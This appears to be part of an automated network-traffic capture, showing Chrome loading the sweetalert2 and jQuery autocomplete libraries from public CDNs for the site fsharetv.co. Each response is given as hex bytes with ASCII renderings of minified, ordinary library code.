                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                                                          Referer: https://fsharetv.co/
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          2024-12-15 11:37:55 UTC760INHTTP/1.1 200 OK
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Content-Length: 72095
                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                          Access-Control-Expose-Headers: *
                                                                                                                                                                                          Timing-Allow-Origin: *
                                                                                                                                                                                          Cache-Control: public, max-age=604800, s-maxage=43200
                                                                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                          X-JSD-Version: 11.15.0
                                                                                                                                                                                          X-JSD-Version-Type: version
                                                                                                                                                                                          ETag: W/"1199f-P4G4uH9foG7iI+wWJ9Q0lEsGA2I"
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          Age: 37719
                                                                                                                                                                                          Date: Sun, 15 Dec 2024 11:37:55 GMT
                                                                                                                                                                                          X-Served-By: cache-fra-eddf8230029-FRA, cache-nyc-kteb1890069-NYC
                                                                                                                                                                                          X-Cache: HIT, HIT
                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                          alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                          2024-12-15 11:37:55 UTC1378INData Raw: 2f 2a 21 0a 2a 20 73 77 65 65 74 61 6c 65 72 74 32 20 76 31 31 2e 31 35 2e 30 0a 2a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 4c 69 63 65 6e 73 65 2e 0a 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 74 29 3a 28 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 3f 67 6c 6f 62 61 6c 54 68 69 73 3a 65 7c 7c 73 65 6c 66 29 2e 53 77
                                                                                                                                                                                          Data Ascii: /*!* sweetalert2 v11.15.0* Released under the MIT License.*/!function(e,t){"object"==typeof exports&&"undefined"!=typeof module?module.exports=t():"function"==typeof define&&define.amd?define(t):(e="undefined"!=typeof globalThis?globalThis:e||self).Sw
                                                                                                                                                                                          2024-12-15 11:37:55 UTC1378INData Raw: 72 6f 67 72 65 73 73 2d 73 74 65 70 22 2c 22 70 72 6f 67 72 65 73 73 2d 73 74 65 70 2d 6c 69 6e 65 22 2c 22 6c 6f 61 64 65 72 22 2c 22 6c 6f 61 64 69 6e 67 22 2c 22 73 74 79 6c 65 64 22 2c 22 74 6f 70 22 2c 22 74 6f 70 2d 73 74 61 72 74 22 2c 22 74 6f 70 2d 65 6e 64 22 2c 22 74 6f 70 2d 6c 65 66 74 22 2c 22 74 6f 70 2d 72 69 67 68 74 22 2c 22 63 65 6e 74 65 72 22 2c 22 63 65 6e 74 65 72 2d 73 74 61 72 74 22 2c 22 63 65 6e 74 65 72 2d 65 6e 64 22 2c 22 63 65 6e 74 65 72 2d 6c 65 66 74 22 2c 22 63 65 6e 74 65 72 2d 72 69 67 68 74 22 2c 22 62 6f 74 74 6f 6d 22 2c 22 62 6f 74 74 6f 6d 2d 73 74 61 72 74 22 2c 22 62 6f 74 74 6f 6d 2d 65 6e 64 22 2c 22 62 6f 74 74 6f 6d 2d 6c 65 66 74 22 2c 22 62 6f 74 74 6f 6d 2d 72 69 67 68 74 22 2c 22 67 72 6f 77 2d 72 6f 77
                                                                                                                                                                                          Data Ascii: rogress-step","progress-step-line","loader","loading","styled","top","top-start","top-end","top-left","top-right","center","center-start","center-end","center-left","center-right","bottom","bottom-start","bottom-end","bottom-left","bottom-right","grow-row
                                                                                                                                                                                          2024-12-15 11:37:55 UTC1378INData Raw: 74 69 6f 6e 73 7d 20 2e 24 7b 72 2e 63 6f 6e 66 69 72 6d 7d 60 29 2c 50 3d 28 29 3d 3e 76 28 60 2e 24 7b 72 2e 61 63 74 69 6f 6e 73 7d 20 2e 24 7b 72 2e 63 61 6e 63 65 6c 7d 60 29 2c 54 3d 28 29 3d 3e 76 28 60 2e 24 7b 72 2e 61 63 74 69 6f 6e 73 7d 20 2e 24 7b 72 2e 64 65 6e 79 7d 60 29 2c 53 3d 28 29 3d 3e 76 28 60 2e 24 7b 72 2e 6c 6f 61 64 65 72 7d 60 29 2c 4f 3d 28 29 3d 3e 77 28 72 2e 61 63 74 69 6f 6e 73 29 2c 4d 3d 28 29 3d 3e 77 28 72 2e 66 6f 6f 74 65 72 29 2c 6a 3d 28 29 3d 3e 77 28 72 5b 22 74 69 6d 65 72 2d 70 72 6f 67 72 65 73 73 2d 62 61 72 22 5d 29 2c 48 3d 28 29 3d 3e 77 28 72 2e 63 6c 6f 73 65 29 2c 49 3d 28 29 3d 3e 7b 63 6f 6e 73 74 20 65 3d 43 28 29 3b 69 66 28 21 65 29 72 65 74 75 72 6e 5b 5d 3b 63 6f 6e 73 74 20 74 3d 65 2e 71 75 65
                                                                                                                                                                                          Data Ascii: tions} .${r.confirm}`),P=()=>v(`.${r.actions} .${r.cancel}`),T=()=>v(`.${r.actions} .${r.deny}`),S=()=>v(`.${r.loader}`),O=()=>w(r.actions),M=()=>w(r.footer),j=()=>w(r["timer-progress-bar"]),H=()=>w(r.close),I=()=>{const e=C();if(!e)return[];const t=e.que
                                                                                                                                                                                          2024-12-15 11:37:55 UTC1378INData Raw: 7d 29 29 7d 7d 2c 4e 3d 28 65 2c 74 29 3d 3e 7b 69 66 28 21 74 29 72 65 74 75 72 6e 21 31 3b 63 6f 6e 73 74 20 6e 3d 74 2e 73 70 6c 69 74 28 2f 5c 73 2b 2f 29 3b 66 6f 72 28 6c 65 74 20 74 3d 30 3b 74 3c 6e 2e 6c 65 6e 67 74 68 3b 74 2b 2b 29 69 66 28 21 65 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 28 6e 5b 74 5d 29 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 5f 3d 28 65 2c 74 2c 6e 29 3d 3e 7b 69 66 28 28 28 65 2c 74 29 3d 3e 7b 41 72 72 61 79 2e 66 72 6f 6d 28 65 2e 63 6c 61 73 73 4c 69 73 74 29 2e 66 6f 72 45 61 63 68 28 28 6e 3d 3e 7b 4f 62 6a 65 63 74 2e 76 61 6c 75 65 73 28 72 29 2e 69 6e 63 6c 75 64 65 73 28 6e 29 7c 7c 4f 62 6a 65 63 74 2e 76 61 6c 75 65 73 28 61 29 2e 69 6e 63 6c 75 64 65 73 28 6e 29 7c 7c 4f 62 6a
                                                                                                                                                                                          Data Ascii: }))}},N=(e,t)=>{if(!t)return!1;const n=t.split(/\s+/);for(let t=0;t<n.length;t++)if(!e.classList.contains(n[t]))return!1;return!0},_=(e,t,n)=>{if(((e,t)=>{Array.from(e.classList).forEach((n=>{Object.values(r).includes(n)||Object.values(a).includes(n)||Obj
                                                                                                                                                                                          2024-12-15 11:37:55 UTC1378INData Raw: 6e 67 74 68 3b 65 2b 2b 29 7b 63 6f 6e 73 74 20 6f 3d 6e 5b 65 5d 3b 69 66 28 6f 20 69 6e 73 74 61 6e 63 65 6f 66 20 48 54 4d 4c 45 6c 65 6d 65 6e 74 26 26 4e 28 6f 2c 74 29 29 72 65 74 75 72 6e 20 6f 7d 7d 2c 59 3d 28 65 2c 74 2c 6e 29 3d 3e 7b 6e 3d 3d 3d 60 24 7b 70 61 72 73 65 49 6e 74 28 6e 29 7d 60 26 26 28 6e 3d 70 61 72 73 65 49 6e 74 28 6e 29 29 2c 6e 7c 7c 30 3d 3d 3d 70 61 72 73 65 49 6e 74 28 6e 29 3f 65 2e 73 74 79 6c 65 2e 73 65 74 50 72 6f 70 65 72 74 79 28 74 2c 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 6e 3f 60 24 7b 6e 7d 70 78 60 3a 6e 29 3a 65 2e 73 74 79 6c 65 2e 72 65 6d 6f 76 65 50 72 6f 70 65 72 74 79 28 74 29 7d 2c 58 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6c 65 74 20 74 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68
                                                                                                                                                                                          Data Ascii: ngth;e++){const o=n[e];if(o instanceof HTMLElement&&N(o,t))return o}},Y=(e,t,n)=>{n===`${parseInt(n)}`&&(n=parseInt(n)),n||0===parseInt(n)?e.style.setProperty(t,"number"==typeof n?`${n}px`:n):e.style.removeProperty(t)},X=function(e){let t=arguments.length
                                                                                                                                                                                          2024-12-15 11:37:55 UTC1378INData Raw: 7b 72 2e 63 6c 6f 73 65 7d 22 3e 3c 2f 62 75 74 74 6f 6e 3e 5c 6e 20 20 20 3c 75 6c 20 63 6c 61 73 73 3d 22 24 7b 72 5b 22 70 72 6f 67 72 65 73 73 2d 73 74 65 70 73 22 5d 7d 22 3e 3c 2f 75 6c 3e 5c 6e 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 24 7b 72 2e 69 63 6f 6e 7d 22 3e 3c 2f 64 69 76 3e 5c 6e 20 20 20 3c 69 6d 67 20 63 6c 61 73 73 3d 22 24 7b 72 2e 69 6d 61 67 65 7d 22 20 2f 3e 5c 6e 20 20 20 3c 68 32 20 63 6c 61 73 73 3d 22 24 7b 72 2e 74 69 74 6c 65 7d 22 20 69 64 3d 22 24 7b 72 2e 74 69 74 6c 65 7d 22 3e 3c 2f 68 32 3e 5c 6e 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 24 7b 72 5b 22 68 74 6d 6c 2d 63 6f 6e 74 61 69 6e 65 72 22 5d 7d 22 20 69 64 3d 22 24 7b 72 5b 22 68 74 6d 6c 2d 63 6f 6e 74 61 69 6e 65 72 22 5d 7d 22 3e 3c 2f 64 69 76 3e 5c
                                                                                                                                                                                          Data Ascii: {r.close}"></button>\n <ul class="${r["progress-steps"]}"></ul>\n <div class="${r.icon}"></div>\n <img class="${r.image}" />\n <h2 class="${r.title}" id="${r.title}"></h2>\n <div class="${r["html-container"]}" id="${r["html-container"]}"></div>\
                                                                                                                                                                                          2024-12-15 11:37:55 UTC1378INData Raw: 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2c 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 5d 2c 5b 72 5b 22 6e 6f 2d 62 61 63 6b 64 72 6f 70 22 5d 2c 72 5b 22 74 6f 61 73 74 2d 73 68 6f 77 6e 22 5d 2c 72 5b 22 68 61 73 2d 63 6f 6c 75 6d 6e 22 5d 5d 29 2c 21 30 29 7d 29 28 29 3b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 7c 7c 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 64 6f 63 75 6d 65 6e 74 29 72 65 74 75 72 6e 20 76 6f 69 64 20 64 28 22 53 77 65 65 74 41 6c 65 72 74 32 20 72 65 71 75 69 72 65 73 20 64 6f 63 75 6d 65 6e 74 20 74 6f 20 69 6e 69 74 69 61 6c 69 7a 65 22 29 3b 63 6f 6e 73 74 20 6e 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64
                                                                                                                                                                                          Data Ascii: document.documentElement,document.body],[r["no-backdrop"],r["toast-shown"],r["has-column"]]),!0)})();if("undefined"==typeof window||"undefined"==typeof document)return void d("SweetAlert2 requires document to initialize");const n=document.createElement("d
                                                                                                                                                                                          2024-12-15 11:37:55 UTC1378INData Raw: 22 61 63 74 69 6f 6e 73 22 29 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 63 6f 6e 73 74 20 6f 3d 78 28 29 2c 69 3d 54 28 29 2c 73 3d 50 28 29 3b 69 66 28 21 6f 7c 7c 21 69 7c 7c 21 73 29 72 65 74 75 72 6e 3b 64 65 28 6f 2c 22 63 6f 6e 66 69 72 6d 22 2c 6e 29 2c 64 65 28 69 2c 22 64 65 6e 79 22 2c 6e 29 2c 64 65 28 73 2c 22 63 61 6e 63 65 6c 22 2c 6e 29 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 2c 6f 29 7b 69 66 28 21 6f 2e 62 75 74 74 6f 6e 73 53 74 79 6c 69 6e 67 29 72 65 74 75 72 6e 20 76 6f 69 64 20 57 28 5b 65 2c 74 2c 6e 5d 2c 72 2e 73 74 79 6c 65 64 29 3b 7a 28 5b 65 2c 74 2c 6e 5d 2c 72 2e 73 74 79 6c 65 64 29 2c 6f 2e 63 6f 6e 66 69 72 6d 42 75 74 74 6f 6e 43 6f 6c 6f 72 26 26 28 65 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 43
                                                                                                                                                                                          Data Ascii: "actions"),function(e,t,n){const o=x(),i=T(),s=P();if(!o||!i||!s)return;de(o,"confirm",n),de(i,"deny",n),de(s,"cancel",n),function(e,t,n,o){if(!o.buttonsStyling)return void W([e,t,n],r.styled);z([e,t,n],r.styled),o.confirmButtonColor&&(e.style.backgroundC
                                                                                                                                                                                          2024-12-15 11:37:55 UTC1378INData Raw: 2c 22 74 65 78 74 61 72 65 61 22 5d 2c 67 65 3d 65 3d 3e 7b 69 66 28 21 65 2e 69 6e 70 75 74 29 72 65 74 75 72 6e 3b 69 66 28 21 41 65 5b 65 2e 69 6e 70 75 74 5d 29 72 65 74 75 72 6e 20 76 6f 69 64 20 64 28 60 55 6e 65 78 70 65 63 74 65 64 20 74 79 70 65 20 6f 66 20 69 6e 70 75 74 21 20 45 78 70 65 63 74 65 64 20 24 7b 4f 62 6a 65 63 74 2e 6b 65 79 73 28 41 65 29 2e 6a 6f 69 6e 28 22 20 7c 20 22 29 7d 2c 20 67 6f 74 20 22 24 7b 65 2e 69 6e 70 75 74 7d 22 60 29 3b 63 6f 6e 73 74 20 74 3d 77 65 28 65 2e 69 6e 70 75 74 29 3b 69 66 28 21 74 29 72 65 74 75 72 6e 3b 63 6f 6e 73 74 20 6e 3d 41 65 5b 65 2e 69 6e 70 75 74 5d 28 74 2c 65 29 3b 58 28 74 29 2c 65 2e 69 6e 70 75 74 41 75 74 6f 46 6f 63 75 73 26 26 73 65 74 54 69 6d 65 6f 75 74 28 28 28 29 3d 3e 7b 52
                                                                                                                                                                                          Data Ascii: ,"textarea"],ge=e=>{if(!e.input)return;if(!Ae[e.input])return void d(`Unexpected type of input! Expected ${Object.keys(Ae).join(" | ")}, got "${e.input}"`);const t=we(e.input);if(!t)return;const n=Ae[e.input](t,e);X(t),e.inputAutoFocus&&setTimeout((()=>{R
                                                                                                                                                                                          2024-12-15 11:37:55 UTC1378INData Raw: 6e 3d 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 69 6e 70 75 74 22 29 2c 6f 3d 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 6f 75 74 70 75 74 22 29 3b 72 65 74 75 72 6e 20 43 65 28 6e 2c 74 2e 69 6e 70 75 74 56 61 6c 75 65 29 2c 6e 2e 74 79 70 65 3d 74 2e 69 6e 70 75 74 2c 43 65 28 6f 2c 74 2e 69 6e 70 75 74 56 61 6c 75 65 29 2c 76 65 28 6e 2c 65 2c 74 29 2c 65 7d 2c 41 65 2e 73 65 6c 65 63 74 3d 28 65 2c 74 29 3d 3e 7b 69 66 28 65 2e 74 65 78 74 43 6f 6e 74 65 6e 74 3d 22 22 2c 74 2e 69 6e 70 75 74 50 6c 61 63 65 68 6f 6c 64 65 72 29 7b 63 6f 6e 73 74 20 6e 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 6f 70 74 69 6f 6e 22 29 3b 56 28 6e 2c 74 2e 69 6e 70 75 74 50 6c 61 63 65 68 6f 6c 64 65 72 29 2c 6e 2e 76 61
                                                                                                                                                                                          Data Ascii: n=e.querySelector("input"),o=e.querySelector("output");return Ce(n,t.inputValue),n.type=t.input,Ce(o,t.inputValue),ve(n,e,t),e},Ae.select=(e,t)=>{if(e.textContent="",t.inputPlaceholder){const n=document.createElement("option");V(n,t.inputPlaceholder),n.va


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          8192.168.2.1649721104.17.24.144436700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-15 11:37:54 UTC588OUTGET /ajax/libs/jquery.devbridge-autocomplete/1.4.11/jquery.autocomplete.min.js HTTP/1.1
                                                                                                                                                                                          Host: cdnjs.cloudflare.com
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                                                          Referer: https://fsharetv.co/
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          2024-12-15 11:37:55 UTC952INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sun, 15 Dec 2024 11:37:55 GMT
                                                                                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                          Cache-Control: public, max-age=30672000
                                                                                                                                                                                          ETag: W/"5eb03ec2-3329"
                                                                                                                                                                                          Last-Modified: Mon, 04 May 2020 16:11:46 GMT
                                                                                                                                                                                          cf-cdnjs-via: cfworker/kv
                                                                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                          Timing-Allow-Origin: *
                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                          CF-Cache-Status: MISS
                                                                                                                                                                                          Expires: Fri, 05 Dec 2025 11:37:55 GMT
                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IAVYbaNpc5GkSZ%2BDhxtwRZXQK1%2FYEmYEL131zV6Qy5pWg5%2B3v4RPbyEsz0BP1%2FdV2nLsd67O4RhkbZutvJIrVXkDWFJzG0bhNsDEBSwV9Pp1%2BXvSv4movQc%2BXh4ewLZqDQ1c5Xpv"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                          NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                          Strict-Transport-Security: max-age=15780000
                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                          CF-RAY: 8f2624f71e5842c6-EWR
                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                          2024-12-15 11:37:55 UTC417INData Raw: 33 33 32 39 0d 0a 2f 2a 2a 0a 2a 20 20 41 6a 61 78 20 41 75 74 6f 63 6f 6d 70 6c 65 74 65 20 66 6f 72 20 6a 51 75 65 72 79 2c 20 76 65 72 73 69 6f 6e 20 31 2e 34 2e 31 31 0a 2a 20 20 28 63 29 20 32 30 31 37 20 54 6f 6d 61 73 20 4b 69 72 64 61 0a 2a 0a 2a 20 20 41 6a 61 78 20 41 75 74 6f 63 6f 6d 70 6c 65 74 65 20 66 6f 72 20 6a 51 75 65 72 79 20 69 73 20 66 72 65 65 6c 79 20 64 69 73 74 72 69 62 75 74 61 62 6c 65 20 75 6e 64 65 72 20 74 68 65 20 74 65 72 6d 73 20 6f 66 20 61 6e 20 4d 49 54 2d 73 74 79 6c 65 20 6c 69 63 65 6e 73 65 2e 0a 2a 20 20 46 6f 72 20 64 65 74 61 69 6c 73 2c 20 73 65 65 20 74 68 65 20 77 65 62 20 73 69 74 65 3a 20 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 64 65 76 62 72 69 64 67 65 2f 6a 51 75 65 72 79 2d 41 75 74 6f
                                                                                                                                                                                          Data Ascii: 3329/*** Ajax Autocomplete for jQuery, version 1.4.11* (c) 2017 Tomas Kirda** Ajax Autocomplete for jQuery is freely distributable under the terms of an MIT-style license.* For details, see the web site: https://github.com/devbridge/jQuery-Auto
                                                                                                                                                                                          2024-12-15 11:37:55 UTC1369INData Raw: 71 75 65 72 79 22 29 3a 6a 51 75 65 72 79 29 7d 28 66 75 6e 63 74 69 6f 6e 28 61 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 62 28 63 2c 64 29 7b 76 61 72 20 65 3d 74 68 69 73 3b 65 2e 65 6c 65 6d 65 6e 74 3d 63 2c 65 2e 65 6c 3d 61 28 63 29 2c 65 2e 73 75 67 67 65 73 74 69 6f 6e 73 3d 5b 5d 2c 65 2e 62 61 64 51 75 65 72 69 65 73 3d 5b 5d 2c 65 2e 73 65 6c 65 63 74 65 64 49 6e 64 65 78 3d 2d 31 2c 65 2e 63 75 72 72 65 6e 74 56 61 6c 75 65 3d 65 2e 65 6c 65 6d 65 6e 74 2e 76 61 6c 75 65 2c 65 2e 74 69 6d 65 6f 75 74 49 64 3d 6e 75 6c 6c 2c 65 2e 63 61 63 68 65 64 52 65 73 70 6f 6e 73 65 3d 7b 7d 2c 65 2e 6f 6e 43 68 61 6e 67 65 54 69 6d 65 6f 75 74 3d 6e 75 6c 6c 2c 65 2e 6f 6e 43 68 61 6e 67 65 3d 6e 75 6c 6c 2c 65 2e 69 73 4c
                                                                                                                                                                                          Data Ascii: query"):jQuery)}(function(a){"use strict";function b(c,d){var e=this;e.element=c,e.el=a(c),e.suggestions=[],e.badQueries=[],e.selectedIndex=-1,e.currentValue=e.element.value,e.timeoutId=null,e.cachedResponse={},e.onChangeTimeout=null,e.onChange=null,e.isL
                                                                                                                                                                                          2024-12-15 11:37:55 UTC1369INData Raw: 63 65 55 72 6c 3a 6e 75 6c 6c 2c 6c 6f 6f 6b 75 70 3a 6e 75 6c 6c 2c 6f 6e 53 65 6c 65 63 74 3a 6e 75 6c 6c 2c 77 69 64 74 68 3a 22 61 75 74 6f 22 2c 6d 69 6e 43 68 61 72 73 3a 31 2c 6d 61 78 48 65 69 67 68 74 3a 33 30 30 2c 64 65 66 65 72 52 65 71 75 65 73 74 42 79 3a 30 2c 70 61 72 61 6d 73 3a 7b 7d 2c 66 6f 72 6d 61 74 52 65 73 75 6c 74 3a 65 2c 66 6f 72 6d 61 74 47 72 6f 75 70 3a 66 2c 64 65 6c 69 6d 69 74 65 72 3a 6e 75 6c 6c 2c 7a 49 6e 64 65 78 3a 39 39 39 39 2c 74 79 70 65 3a 22 47 45 54 22 2c 6e 6f 43 61 63 68 65 3a 21 31 2c 6f 6e 53 65 61 72 63 68 53 74 61 72 74 3a 69 2c 6f 6e 53 65 61 72 63 68 43 6f 6d 70 6c 65 74 65 3a 69 2c 6f 6e 53 65 61 72 63 68 45 72 72 6f 72 3a 69 2c 70 72 65 73 65 72 76 65 49 6e 70 75 74 3a 21 31 2c 63 6f 6e 74 61 69 6e
                                                                                                                                                                                          Data Ascii: ceUrl:null,lookup:null,onSelect:null,width:"auto",minChars:1,maxHeight:300,deferRequestBy:0,params:{},formatResult:e,formatGroup:f,delimiter:null,zIndex:9999,type:"GET",noCache:!1,onSearchStart:i,onSearchComplete:i,onSearchError:i,preserveInput:!1,contain
                                                                                                                                                                                          2024-12-15 11:37:55 UTC1369INData Raw: 69 7a 65 2e 61 75 74 6f 63 6f 6d 70 6c 65 74 65 22 2c 64 2e 66 69 78 50 6f 73 69 74 69 6f 6e 43 61 70 74 75 72 65 29 2c 64 2e 65 6c 2e 6f 6e 28 22 6b 65 79 64 6f 77 6e 2e 61 75 74 6f 63 6f 6d 70 6c 65 74 65 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 64 2e 6f 6e 4b 65 79 50 72 65 73 73 28 61 29 7d 29 2c 64 2e 65 6c 2e 6f 6e 28 22 6b 65 79 75 70 2e 61 75 74 6f 63 6f 6d 70 6c 65 74 65 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 64 2e 6f 6e 4b 65 79 55 70 28 61 29 7d 29 2c 64 2e 65 6c 2e 6f 6e 28 22 62 6c 75 72 2e 61 75 74 6f 63 6f 6d 70 6c 65 74 65 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 64 2e 6f 6e 42 6c 75 72 28 29 7d 29 2c 64 2e 65 6c 2e 6f 6e 28 22 66 6f 63 75 73 2e 61 75 74 6f 63 6f 6d 70 6c 65 74 65 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 64 2e 6f 6e 46 6f
                                                                                                                                                                                          Data Ascii: ize.autocomplete",d.fixPositionCapture),d.el.on("keydown.autocomplete",function(a){d.onKeyPress(a)}),d.el.on("keyup.autocomplete",function(a){d.onKeyUp(a)}),d.el.on("blur.autocomplete",function(){d.onBlur()}),d.el.on("focus.autocomplete",function(){d.onFo
                                                                                                                                                                                          2024-12-15 11:37:55 UTC1369INData Raw: 6c 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 64 69 73 61 62 6c 65 64 3d 21 31 7d 2c 66 69 78 50 6f 73 69 74 69 6f 6e 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 62 3d 74 68 69 73 2c 63 3d 61 28 62 2e 73 75 67 67 65 73 74 69 6f 6e 73 43 6f 6e 74 61 69 6e 65 72 29 2c 64 3d 63 2e 70 61 72 65 6e 74 28 29 2e 67 65 74 28 30 29 3b 69 66 28 64 3d 3d 3d 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 7c 7c 62 2e 6f 70 74 69 6f 6e 73 2e 66 6f 72 63 65 46 69 78 50 6f 73 69 74 69 6f 6e 29 7b 76 61 72 20 65 3d 62 2e 6f 70 74 69 6f 6e 73 2e 6f 72 69 65 6e 74 61 74 69 6f 6e 2c 66 3d 63 2e 6f 75 74 65 72 48 65 69 67 68 74 28 29 2c 67 3d 62 2e 65 6c 2e 6f 75 74 65 72 48 65 69 67 68 74 28 29 2c 68 3d 62 2e 65 6c 2e 6f 66 66 73 65 74 28 29 2c 69 3d 7b 74 6f 70 3a 68
                                                                                                                                                                                          Data Ascii: le:function(){this.disabled=!1},fixPosition:function(){var b=this,c=a(b.suggestionsContainer),d=c.parent().get(0);if(d===document.body||b.options.forceFixPosition){var e=b.options.orientation,f=c.outerHeight(),g=b.el.outerHeight(),h=b.el.offset(),i={top:h
                                                                                                                                                                                          2024-12-15 11:37:55 UTC1369INData Raw: 73 2e 74 61 62 44 69 73 61 62 6c 65 64 3d 3d 3d 21 31 29 72 65 74 75 72 6e 3b 62 72 65 61 6b 3b 63 61 73 65 20 68 2e 52 45 54 55 52 4e 3a 69 66 28 62 2e 73 65 6c 65 63 74 65 64 49 6e 64 65 78 3d 3d 3d 2d 31 29 72 65 74 75 72 6e 20 76 6f 69 64 20 62 2e 68 69 64 65 28 29 3b 62 2e 73 65 6c 65 63 74 28 62 2e 73 65 6c 65 63 74 65 64 49 6e 64 65 78 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 68 2e 55 50 3a 62 2e 6d 6f 76 65 55 70 28 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 68 2e 44 4f 57 4e 3a 62 2e 6d 6f 76 65 44 6f 77 6e 28 29 3b 62 72 65 61 6b 3b 64 65 66 61 75 6c 74 3a 72 65 74 75 72 6e 7d 61 2e 73 74 6f 70 49 6d 6d 65 64 69 61 74 65 50 72 6f 70 61 67 61 74 69 6f 6e 28 29 2c 61 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 7d 7d 2c 6f 6e 4b 65 79 55 70 3a 66
